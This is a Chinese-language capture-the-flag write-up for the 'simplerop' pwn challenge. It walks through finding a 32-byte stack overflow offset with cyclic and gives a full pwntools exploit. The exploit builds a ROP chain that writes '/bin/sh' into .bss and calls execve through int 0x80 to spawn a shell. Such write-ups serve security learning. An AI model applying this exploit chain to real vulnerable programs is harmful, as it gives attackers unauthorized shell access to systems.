分析
使用checksec分析可知,simplerop只开启了NX保护,即栈不可执行,于是只能从其他内存空间下手。
接着使用IDA进行反汇编,分析代码可知该程序使用了read函数,即存在栈溢出漏洞,但是如果把shell放在栈上肯定是行不通的。与此同时,注意read()中的函数,其输入的v4在bss段,而bss段是可执行的。
到此,思路明确,我们可以通过read()函数把shell写入其中,然后通过执行bss段的shell来获取"/bin/sh"权限。
解题
- 先利用cyclic计算偏移
pwndbg> cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
pwndbg> r
Starting program: /home/henhen/Desktop/challenges/simplerop/simplerop
ROP is easy is'nt it ?
Your input :aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
Program received signal SIGSEGV, Segmentation fault.
0x61616169 in ?? ()
cyclic - l 0x61616169
32
得出偏移量为32
- 获取read函数地址,利用其写入ROP链,进行三次ret然后达成目的
ret流程图如下
最终exp如下
from pwn import *
p = process('./simplerop')
read_addr = 0x806CD50
int_80h_addr = 0x080493e1
pop_edx_ecx_ebx_ret = 0x0806e850
pop_eax_ret = 0x080bae06
bin_sh_addr = 0x80eb584
payload = b'a' * 0x20 + p32(read_addr) + p32(pop_edx_ecx_ebx_ret)
payload += p32(0) + p32(bin_sh_addr) + p32(8)
#将/bin/sh写入bss段,read(0,bin_sh_addr,8),
# fd buf size
#写完之后返回read函数,输入下面的payload
payload += p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(0) + p32(bin_sh_addr) + p32(pop_eax_ret) + p32(0xb) + p32(int_80h_addr)
#将int_80(11,bin_sh_addr,0,0)写入bss段
# 系统调用号 缓冲区地址
p.sendline(payload)
p.send("/bin/sh\x00")
p.interactive()
总结
对于该类静态编译的题目,可以利用其可读可执行段(.bss)地址不改变,然后通过构造ROP链进行攻击,这里主要利用int 0x80系统调用执行execve(“/bin/sh”)来达成获取权限的目的。